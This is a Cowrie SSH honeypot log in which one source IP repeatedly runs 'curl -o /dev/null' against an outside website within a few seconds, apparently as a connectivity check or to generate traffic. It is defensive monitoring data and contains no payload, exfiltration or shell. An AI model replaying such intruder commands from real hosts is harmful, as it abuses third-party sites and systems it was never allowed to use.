{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.312959Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.353287Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.354455Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.391643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.392882Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.440564Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.441892Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.500955Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.502341Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.554004Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.555319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.593428Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.594626Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.632256Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.633593Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.671913Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.673273Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.711022Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.712333Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.752371Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.753897Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.793699Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.795377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.834072Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.835402Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.884804Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.886069Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:01.969274Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:01.970764Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.027775Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.029023Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.070043Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.071321Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.108289Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.109842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.148224Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.149520Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.190368Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.191576Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.228708Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.230152Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.267238Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.268471Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.305641Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.306735Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.353571Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.355003Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.391721Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.392768Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.429661Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.430701Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.467353Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.468704Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.506185Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.507216Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.544001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.545223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.582829Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.584198Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.620835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.621974Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.671774Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.672993Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.710957Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.713224Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.760850Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.762081Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.799941Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.801193Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.838426Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.839818Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.876573Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.877634Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.914614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.915738Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.952619Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.953998Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:02.995789Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:02.997001Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.034387Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.035579Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.072539Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.073647Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.113302Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.114415Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.163234Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.164417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.211849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.213050Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.259021Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.260225Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.299667Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.300869Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.340119Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.341261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.422609Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.423718Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.464708Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.465768Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.502798Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.504040Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.750282Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.751574Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.799383Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.800513Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.848587Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.849427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.888497Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.889663Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.928319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.929543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:03.968960Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:03.970172Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.017237Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.018382Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.059071Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.060682Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.109855Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.110947Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.150567Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.151783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.191004Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.192401Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.231007Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.231973Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.280533Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.281609Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.325411Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:04.326863Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:04.364653Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
